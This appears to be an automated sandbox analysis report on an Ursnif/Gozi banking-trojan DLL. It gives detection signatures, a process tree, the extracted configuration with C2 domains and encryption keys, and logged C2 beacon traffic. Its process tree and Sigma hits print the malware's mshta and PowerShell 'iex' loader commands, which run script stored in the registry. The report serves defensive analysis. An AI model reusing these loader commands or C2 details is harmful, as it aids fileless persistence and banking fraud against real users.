Windows Analysis Report 3a94.dll

Overview

General Information

Sample Name: 3a94.dll
Analysis ID: 444316
MD5: 3a943173c6de419b7078e88c20997838
SHA1: 56567824c6b5c62112a74daa7a1a66e2ec0505d3
SHA256: af98c908f45b6b7893b8cc3121517488c94a93d015af71cd86f8269a971a8836
Tags: dll gozi

Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Sigma detected: Encoded IEX
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Ursnif
Hooks registry keys query functions (used to hide registry keys)
Modifies the export address table of user mode modules (user mode EAT hooks)
Modifies the import address table of user mode modules (user mode IAT hooks)
Modifies the prolog of user mode functions (user mode inline hooks)
Sigma detected: MSHTA Spawning Windows Shell
Sigma detected: Mshta Spawning Windows Shell
Suspicious powershell command line found
Writes registry values via WMI
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 4632 cmdline: loaddll32.exe 'C:\Users\user\Desktop\3a94.dll' MD5: 542795ADF7CC08EFCF675D65310596E8)
    • cmd.exe (PID: 4196 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\3a94.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 5652 cmdline: rundll32.exe 'C:\Users\user\Desktop\3a94.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 5444 cmdline: rundll32.exe C:\Users\user\Desktop\3a94.dll,Seasonthing MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 3336 cmdline: rundll32.exe C:\Users\user\Desktop\3a94.dll,Seatforce MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 5528 cmdline: rundll32.exe C:\Users\user\Desktop\3a94.dll,Spaceclose MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 996 cmdline: rundll32.exe C:\Users\user\Desktop\3a94.dll,Time MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • iexplore.exe (PID: 4580 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 6424 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4580 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • iexplore.exe (PID: 5936 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4580 CREDAT:17422 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • iexplore.exe (PID: 5168 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4580 CREDAT:17428 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • mshta.exe (PID: 2264 cmdline: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Gpk8='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Gpk8).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>' MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 1384 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 6844 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"lang_id": "RU, CN", "RSA Public Key": "ESo3IAssZzE5ysG1EIw/4HtXAsFSsy8tqEpVxnbfbMCCYrlFNqq+URa5v25Vb8Fqg7CHgZW6+XrIJ25ylHpxuJ37IEqPduLid4tbupuJSyqgtTppR4zn02IvafAxKMAHSa619wHPy17p4K0/4kj7C1qaKtM+Xh1a06NCKm5N+m786e7cPquu7R927nhH6gnnNo+As4++HjROKgvXHXtuBEcH4AtLrYsdhCKBIunRJ4/JRjUYKn0tSnPBDf+Na9jWpvJHGTOYnu1CoHdLJTA2dOf5StD7LA6zUT/gtRsdQh+Fypc8IFyYvOY0WUwFr+dLMrtodQ8p5Mt7Wi/ACSlplY8XX2NGugFn+jyVYhw+Opw=", "c2_domain": ["gtr.antoinfer.com", "app.bighomegl.at"], "botnet": "6000", "server": "580", "serpent_key": "PNJeXnLTijShJqmR", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "10"}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000003.00000003.418720560.00000000053C8000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000003.00000003.418659706.00000000053C8000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000003.00000003.418632561.00000000053C8000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000003.00000003.418768006.00000000053C8000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000003.00000003.444948435.00000000051CC000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |

Unpacked PEs

Source | Rule | Description | Author | Strings
3.3.rundll32.exe.53494a0.2.raw.unpack | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |

              Sigma Overview

              System Summary:

              Sigma detected: Encoded IEX
              Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Gpk8='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Gpk8).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 2264, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), ProcessId: 1384
              Sigma detected: MSHTA Spawning Windows Shell
              Source: Process startedAuthor: Michael Haag: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Gpk8='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Gpk8).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 2264, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), ProcessId: 1384
              Sigma detected: Mshta Spawning Windows Shell
              Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Gpk8='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Gpk8).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 2264, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), ProcessId: 1384
              Sigma detected: Non Interactive PowerShell
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Gpk8='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Gpk8).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 2264, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), ProcessId: 1384

              Jbx Signature Overview

              AV Detection:

              Found malware configuration
              Source: 00000005.00000003.347281616.0000000002810000.00000040.00000001.sdmpMalware Configuration Extractor: Ursnif {"lang_id": "RU, CN", "RSA Public Key": "ESo3IAssZzE5ysG1EIw/4HtXAsFSsy8tqEpVxnbfbMCCYrlFNqq+URa5v25Vb8Fqg7CHgZW6+XrIJ25ylHpxuJ37IEqPduLid4tbupuJSyqgtTppR4zn02IvafAxKMAHSa619wHPy17p4K0/4kj7C1qaKtM+Xh1a06NCKm5N+m786e7cPquu7R927nhH6gnnNo+As4++HjROKgvXHXtuBEcH4AtLrYsdhCKBIunRJ4/JRjUYKn0tSnPBDf+Na9jWpvJHGTOYnu1CoHdLJTA2dOf5StD7LA6zUT/gtRsdQh+Fypc8IFyYvOY0WUwFr+dLMrtodQ8p5Mt7Wi/ACSlplY8XX2NGugFn+jyVYhw+Opw=", "c2_domain": ["gtr.antoinfer.com", "app.bighomegl.at"], "botnet": "6000", "server": "580", "serpent_key": "PNJeXnLTijShJqmR", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "10"}
              Multi AV Scanner detection for submitted file
              Source: 3a94.dll | ReversingLabs: Detection: 68%
              Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_046139C5 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError
              Source: 3a94.dll | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
              Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe | File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll
              Source: 3a94.dll | Static PE information: DYNAMIC_BASE, NX_COMPAT
              Source: Binary string: 8C:\Users\user\AppData\Local\Temp\vy3v4iby\vy3v4iby.pdb source: powershell.exe, 0000001D.00000002.519694459.000001F1B3EFA000.00000004.00000001.sdmp
              Source: Binary string: 8C:\Users\user\AppData\Local\Temp\vy3v4iby\vy3v4iby.pdbXP source: powershell.exe, 0000001D.00000002.519694459.000001F1B3EFA000.00000004.00000001.sdmp
              Source: Binary string: 8C:\Users\user\AppData\Local\Temp\l4nvux4c\l4nvux4c.pdbXP source: powershell.exe, 0000001D.00000002.519823247.000001F1B3F44000.00000004.00000001.sdmp
              Source: Binary string: c:\418\521\Condition\lake\Free_yet\Sky.pdb source: 3a94.dll
              Source: Binary string: 8C:\Users\user\AppData\Local\Temp\l4nvux4c\l4nvux4c.pdb source: powershell.exe, 0000001D.00000002.519823247.000001F1B3F44000.00000004.00000001.sdmp

              Networking:

              Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
              Source: Traffic | Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.5:49717 -> 165.232.183.49:80
              Source: Traffic | Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.5:49717 -> 165.232.183.49:80
              Source: Traffic | Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.5:49720 -> 165.232.183.49:80
              Source: Traffic | Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.5:49720 -> 165.232.183.49:80
              Source: Traffic | Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.5:49722 -> 165.232.183.49:80
              Source: Traffic | Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.5:49722 -> 165.232.183.49:80
              Source: Traffic | Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.5:49730 -> 165.232.183.49:80
              Source: Traffic | Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.5:49730 -> 165.232.183.49:80
              Source: Traffic | Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.5:49734 -> 165.232.183.49:80
              Source: Traffic | Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.5:49734 -> 165.232.183.49:80
              Source: Joe Sandbox View | ASN Name: ALLEGHENYHEALTHNETWORKUS ALLEGHENYHEALTHNETWORKUS
              Source: global trafficHTTP traffic detected: GET /OQ_2BTgG7j/q3X1MGdBBGa9_2B2m/1G0QfKWqT4Al/JC4ZC0WOm7j/4CP941a6dpq6AY/NxMuCeGanwp5x6mxFdtm_/2BQQ_2BZBXUS0UsE/so7pu77WVpSX0kE/e_2FC7i8m9HUadv_2F/jHuYwYKPu/BKlyw96_2B2HnlpmSd5G/KHfN8q_2FZUhddmueVc/VN22bVsSXOc1F2H2TTIYic/FU2T3AQj_2Bf0/Yc7WUnV_/2FNtnojv1lJnCN4_2B2aG1E/ZT_2F8RuAw/TC3tCpega8r1SAjDV/0ZScgJdMygUO/w95b0xrv2QT/DGrWX40QWt0tWT/QGDiJ9RLs/CJ HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: gtr.antoinfer.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: gtr.antoinfer.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /HXJGZh1qBjYM0G/CMDVQercp7WT9ydNTkT_2/BA1T_2BoFtrG_2Bw/Wj8IRI6jThedYoW/YXdrjvBKs_2BWTN1jd/cRVlgWa0o/p1MOk_2BLI89mWlaMirs/Gdw7n3bR8ORjIY_2Fx6/NYz_2BwvSm9u2x0DN_2BOH/Ni1nKLSa9JhBd/ZE9joS5j/ehlmvjX_2FlxlUw7sENHL6w/CDmAOpgIB5/uqJKH_2B5K5P34v5C/Q_2BbSOhpl7C/1na6SsW0l2M/cy_2FPqMdKquM4/T1TrxnsCco2huo0cd5MLY/0H3wDM7jB_2F837m/FO_2FMxSAhLyD6r/IIFbv4aVX2Mk_2FOSl/48WQx68DGUnQj/_2BFfob HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: gtr.antoinfer.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: gtr.antoinfer.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /TqiKTzAsbmeVPNQuTP2qUWh/hVxtTSY3Yi/llcJ7qkCpZzGG2TVm/waTVAbLoSME8/MiGLgEPqC5C/QMacbN7bi5gg4i/EPDpjwjNeqvxB8nx8goUN/7UScKdA3erCdyZnr/M1mYt7N44_2BCZB/z_2BQHKBZE3I76X4pk/LLUxigZ_2/FKtPJihoxkrQplteHpxJ/SQ5O5MOBE3EqfyedXsa/WMc6NwZF0braqCo_2FtHND/MeZCuTIpsRPeP/oRY2gUKx/_2BWnIG4Butzcab_2F67iqF/5L_2FfljiF/BmcXquDrczHDDG7sB/8E2Nz3hVUHpI/Iejf3l0Gse2/15LRCzp_2Bw/0DMy HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: gtr.antoinfer.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /kXu9tnPyh7IrxOnM_/2F5RL9McC0pC/V4JAp24MS7Z/JdKAzMH5afqP6U/5QKmnqIf4ji_2F0bYULim/Ln9m9S8CJYQHSAL8/9V4ln6b18wizYxs/lBvgnWHKscbAmpSE6F/UvyDHh12X/4KiHWavyPolIq4enzVWO/gZBgK_2BixX_2FpKOLN/j_2FfrEitBIUH8MDLOcNHJ/NhB576j_2Fx2n/eQ5OwroG/raMZRrL38_2FMqHXUW7maRX/ilf2Nc3TMF/dkY1WHkQs6cMiRoJ2/AWmEChw_2BA5/L5BFJV5SVgy/cNqd1hVvvZotyw/XPfvzeOgszjC/s HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Host: todo.faroin.at
              Source: global trafficHTTP traffic detected: GET /6g7Xxs_2FcViNEvb/eUtlbGrmJOFyKjq/4FN1_2BKuLEoXjCSjf/rOtT7yIKe/XRB6VT8HCmGKCo9CPKHU/Y1tIeEDJ_2FZ5yl_2FC/3CWd28J10mPHAD4tnrT0eQ/4O_2BGRTBNWA2/fqx1qdU0/QI6EnaEphgC1mUE1Thrm53Z/ztU91Ji5Ak/31pVhif7ltLzOz9wa/PTfZf7fPEDoP/uPtRBBL_2F_/2FyHjGxoZIO3t9/kK4G4Vnymr0EDYoDEeLP8/HOyGGLeAWlRehWGS/nV7QbBb2S9gvK76/W7SlcXxU8wsH_2FGY1/v4Zp7Lft8CnCAMr/yLw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Host: todo.faroin.at
              Source: unknownDNS traffic detected: queries for: gtr.antoinfer.com
              Source: unknownHTTP traffic detected: POST /xJvow4_2/BJDMWjUnNijevmUW57WQQAD/EfF5Sspcyc/NJzdVTwdvpiYxkuku/nPGWvkA08XkQ/vBCHroC_2FE/9zehC8tkQdIdvs/O6XnkCJmSqv_2BmOlhbVu/HQOKlqimRyOan0Iq/gsEUxPO_2FhQGh0/jcvQ1wIS8Gsr9_2FfD/7E8mUZJ_2/BsH5YpBp8iAwhSj0WpLx/lHUKRpbxx3m_2BkZ1XY/A4clpRwWuRrbu_2BeomIJB/3Z5OAlfx3ZfTa/Zr5HnaAB/X29Vmpecpgs5PpmOqAd16fZ/L2jQuizAg_/2BSqqpGpXSe3rgahN/25lGwyN_2BXg/x HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Content-Length: 2Host: todo.faroin.at
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 05 Jul 2021 14:52:48 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzip
              Source: {166D056A-DDEC-11EB-90E5-ECF4BB570DC9}.dat.20.dr | String found in binary or memory: http://gtr.antoinfer.com/HXJGZh1qBjYM0G/CMDVQercp7WT9ydNTkT_2/BA1T_2BoFtrG_2Bw/Wj8IRI6jThedYoW/YXdrj
              Source: {166D0568-DDEC-11EB-90E5-ECF4BB570DC9}.dat.20.dr, ~DF6EAF3ABE87705E33.TMP.20.dr | String found in binary or memory: http://gtr.antoinfer.com/OQ_2BTgG7j/q3X1MGdBBGa9_2B2m/1G0QfKWqT4Al/JC4ZC0WOm7j/4CP941a6dpq6AY/NxMuCe
              Source: {1D3BDB90-DDEC-11EB-90E5-ECF4BB570DC9}.dat.20.dr | String found in binary or memory: http://gtr.antoinfer.com/TqiKTzAsbmeVPNQuTP2qUWh/hVxtTSY3Yi/llcJ7qkCpZzGG2TVm/waTVAbLoSME8/MiGLgEPqC
              Source: powershell.exe, 0000001D.00000002.520030038.000001F1BF6C2000.00000004.00000001.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
              Source: powershell.exe, 0000001D.00000002.495812915.000001F1AF870000.00000004.00000001.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: powershell.exe, 0000001D.00000002.492071617.000001F1AF661000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 0000001D.00000002.495812915.000001F1AF870000.00000004.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: powershell.exe, 0000001D.00000002.520030038.000001F1BF6C2000.00000004.00000001.sdmp | String found in binary or memory: https://contoso.com/
              Source: powershell.exe, 0000001D.00000002.520030038.000001F1BF6C2000.00000004.00000001.sdmp | String found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 0000001D.00000002.520030038.000001F1BF6C2000.00000004.00000001.sdmp | String found in binary or memory: https://contoso.com/License
              Source: powershell.exe, 0000001D.00000002.495812915.000001F1AF870000.00000004.00000001.sdmp | String found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 0000001D.00000002.520030038.000001F1BF6C2000.00000004.00000001.sdmp | String found in binary or memory: https://nuget.org/nuget.exe

              Key, Mouse, Clipboard, Microphone and Screen Capturing:

              Yara detected Ursnif
              Source: Yara match | File source: 3.3.rundll32.exe.53494a0.2.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 00000003.00000003.418720560.00000000053C8000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara match | File source: 00000003.00000003.418659706.00000000053C8000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara match | File source: 00000003.00000003.418632561.00000000053C8000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara match | File source: 00000003.00000003.418768006.00000000053C8000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara match | File source: 00000003.00000003.444948435.00000000051CC000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara match | File source: 00000003.00000003.418736133.00000000053C8000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara match | File source: 00000003.00000003.418683984.00000000053C8000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara match | File source: 00000003.00000003.418753102.00000000053C8000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara match | File source: 00000003.00000003.432262263.0000000005349000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara match | File source: 00000003.00000003.418703457.00000000053C8000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 5652, type: MEMORY

              E-Banking Fraud:

              Yara detected Ursnif
              Source: Yara match | File source: 3.3.rundll32.exe.53494a0.2.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 00000003.00000003.418720560.00000000053C8000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara match | File source: 00000003.00000003.418659706.00000000053C8000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara match | File source: 00000003.00000003.418632561.00000000053C8000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara match | File source: 00000003.00000003.418768006.00000000053C8000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara match | File source: 00000003.00000003.444948435.00000000051CC000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara match | File source: 00000003.00000003.418736133.00000000053C8000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara match | File source: 00000003.00000003.418683984.00000000053C8000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara match | File source: 00000003.00000003.418753102.00000000053C8000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara match | File source: 00000003.00000003.432262263.0000000005349000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara match | File source: 00000003.00000003.418703457.00000000053C8000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 5652, type: MEMORY
              Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_046139C5 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError

              System Summary:

              Writes registry values via WMI
              Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
              Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
              Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
              Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
              Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
